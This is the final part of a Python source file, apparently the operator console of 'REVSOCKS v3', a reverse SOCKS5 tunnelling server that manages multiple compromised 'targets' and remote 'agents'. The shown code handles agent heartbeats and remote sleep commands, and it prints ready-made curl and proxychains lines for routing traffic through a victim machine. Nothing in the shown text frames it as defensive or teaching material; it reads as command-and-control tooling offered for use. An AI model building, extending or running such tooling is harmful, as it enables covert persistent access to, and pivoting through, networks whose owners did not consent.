        return f"{b/(1024*1024*1024):.1f}GB"
    
    def _cmd_rename(self, id_or_name, new_name):
        target = self._resolve_target(id_or_name)
        if not target:
            print(f"  [!] Target not found: {id_or_name}")
            return
        old = target.name
        target.name = new_name
        self.mgr._save_state()
        print(f"  [+] [{target.id}] '{old}' -> '{new_name}'")
    
    def _cmd_info(self, id_or_name):
        target = self._resolve_target(id_or_name)
        if not target:
            print(f"  [!] Target not found: {id_or_name}")
            return
        
        now = datetime.now()
        status = "\033[32mCONNECTED\033[0m" if target.connected else "\033[31mDISCONNECTED\033[0m"
        uptime = str(now - target.connect_time).split('.')[0] if target.connected else "N/A"
        last_hb = str(now - target.last_heartbeat).split('.')[0]
        enc = "ChaCha20-Poly1305"
        send_kbps, recv_kbps = target.bandwidth.get_rates() if target.connected else (0, 0)
        
        print(f"""
\033[1;36m┌─────────────────────────────────────────────┐\033[0m
\033[1;36m│\033[0m Target #{target.id}: \033[1m{target.name}\033[0m
\033[1;36m├─────────────────────────────────────────────┤\033[0m
\033[1;36m│\033[0m Remote IP      : {target.remote_ip}
\033[1;36m│\033[0m SOCKS5 Port    : {target.socks_port}
\033[1;36m│\033[0m Status         : {status}
\033[1;36m│\033[0m Encryption     : {enc}
\033[1;36m│\033[0m Connected      : {target.connect_time.strftime('%Y-%m-%d %H:%M:%S')}
\033[1;36m│\033[0m Uptime         : {uptime}
\033[1;36m│\033[0m Last Heartbeat : {last_hb} ago
\033[1;36m│\033[0m Active Streams : {len(target.streams)}
\033[1;36m│\033[0m Bytes Sent     : {self._human_bytes(target.bytes_sent)} ({send_kbps:.1f} KB/s)
\033[1;36m│\033[0m Bytes Recv     : {self._human_bytes(target.bytes_recv)} ({recv_kbps:.1f} KB/s)
\033[1;36m├─────────────────────────────────────────────┤\033[0m
\033[1;36m│\033[0m \033[1mSOCKS5 Credentials:\033[0m
\033[1;36m│\033[0m   User: {SOCKS_USER}
\033[1;36m│\033[0m   Pass: {SOCKS_PASS}
\033[1;36m│\033[0m
\033[1;36m│\033[0m \033[1mUsage:\033[0m
\033[1;36m│\033[0m   curl --socks5 {SOCKS_USER}:{SOCKS_PASS}@127.0.0.1:{target.socks_port} http://TARGET
\033[1;36m│\033[0m   proxychains: socks5 127.0.0.1 {target.socks_port} {SOCKS_USER} {SOCKS_PASS}
\033[1;36m└─────────────────────────────────────────────┘\033[0m
""")
    
    def _cmd_health(self):
        for t in self.mgr.get_all_targets():
            if t.connected:
                ok = send_to_target(t, CMD_HEARTBEAT, 0)
                status = "\033[32mALIVE\033[0m" if ok else "\033[31mDEAD\033[0m"
            else:
                status = "\033[31mOFFLINE\033[0m"
            print(f"  [{t.id}] {t.name}: {status}")
        print()
    
    def _cmd_kill(self, id_or_name):
        target = self._resolve_target(id_or_name)
        if not target:
            print(f"  [!] Target not found: {id_or_name}")
            return
        if target.connected:
            try: target.sock.close()
            except: pass
            if target.socks_server:
                try: target.socks_server.close()
                except: pass
                target.socks_server = None
            for sid, s in list(target.streams.items()):
                try: s.close()
                except: pass
            target.streams.clear()
            target.connected = False
            if target.sock in self.mgr.targets_by_sock:
                del self.mgr.targets_by_sock[target.sock]
            self.mgr._save_state()
            print(f"  [+] Killed [{target.id}] {target.name}")
        else:
            print(f"  [!] Already offline")
    
    def _cmd_remove(self, id_or_name):
        target = self._resolve_target(id_or_name)
        if not target:
            print(f"  [!] Not found: {id_or_name}")
            return
        if target.connected:
            print(f"  [!] Still connected — use 'kill' first")
            return
        if target.socks_server:
            try: target.socks_server.close()
            except: pass
        del self.mgr.targets[target.id]
        self.mgr._save_state()
        print(f"  [+] Removed [{target.id}] {target.name}")
    
    def _cmd_clean(self):
        removed = 0
        for t in list(self.mgr.targets.values()):
            if not t.connected:
                if t.socks_server:
                    try: t.socks_server.close()
                    except: pass
                del self.mgr.targets[t.id]
                removed += 1
        self.mgr._save_state()
        print(f"  [+] Cleaned {removed} offline targets")
    
    def _cmd_sleep(self, id_or_name, seconds_str):
        target = self._resolve_target(id_or_name)
        if not target:
            print(f"  [!] Not found: {id_or_name}")
            return
        if not target.connected:
            print(f"  [!] Target offline")
            return
        try:
            seconds = int(seconds_str)
        except:
            print(f"  [!] Invalid seconds: {seconds_str}")
            return
        
        # Send sleep command to agent
        sleep_data = struct.pack(">I", seconds)
        if send_to_target(target, CMD_SLEEP, 0, sleep_data):
            print(f"  [+] Sleep command sent to [{target.id}] {target.name} for {seconds}s")
        else:
            print(f"  [!] Failed to send sleep command")
    
    def _cmd_use(self, id_or_name):
        target = self._resolve_target(id_or_name)
        if not target:
            print(f"  [!] Not found: {id_or_name}")
            return
        if not target.connected:
            print(f"  [!] Target OFFLINE")
            return
        
        print(f"""
  Target: [{target.id}] {target.name} ({target.remote_ip})
  SOCKS5 : \033[1m127.0.0.1:{target.socks_port}\033[0m
  Auth   : \033[1m{SOCKS_USER}:{SOCKS_PASS}\033[0m

  \033[33mcurl --socks5 {SOCKS_USER}:{SOCKS_PASS}@127.0.0.1:{target.socks_port} http://TARGET\033[0m
  \033[33mproxychains conf: socks5 127.0.0.1 {target.socks_port} {SOCKS_USER} {SOCKS_PASS}\033[0m
""")
    
    def _cmd_exit(self):
        self.running = False
        os._exit(0)
    
    def _resolve_target(self, id_or_name) -> Target:
        try:
            return self.mgr.get_target_by_id(int(id_or_name))
        except ValueError:
            return self.mgr.get_target_by_name(id_or_name)


# ============ Main ============

def main():
    print(f"""
\033[36m
+===================================================+
|   REVSOCKS v3 - Multi-Target Reverse SOCKS5       |
+=========================+=========================+
|  Tunnel   : 0.0.0.0:{TUNNEL_PORT:<5}| Encryption: {'ChaCha20' if True else 'None':<13}|
|  SOCKS    : :{BASE_SOCKS_PORT}+      | Auth      : {SOCKS_USER}:{SOCKS_PASS}  |
+=========================+=========================+
\033[0m""")
    
    mgr = TargetManager()
    
    threading.Thread(target=TunnelListener(mgr).start, daemon=True).start()
    threading.Thread(target=HealthMonitor(mgr).start, daemon=True).start()
    threading.Thread(target=LocalTunnelListener(mgr).start, daemon=True).start()
    print(f"  [*] CF bridge listener: 127.0.0.1:4444 (plaintext)")
    
    if TLS_ENABLED:
        print(f"  [*] TLS: enabled")
    else:
        print(f"  [*] TLS: disabled (no cert)")
    print(f"  [*] Health check: every {HEALTH_CHECK_INTERVAL}s")
    print(f"  [*] Waiting for agents...\n")
    
    cli = CLI(mgr)
    cli.start()


if __name__ == "__main__":
    main()
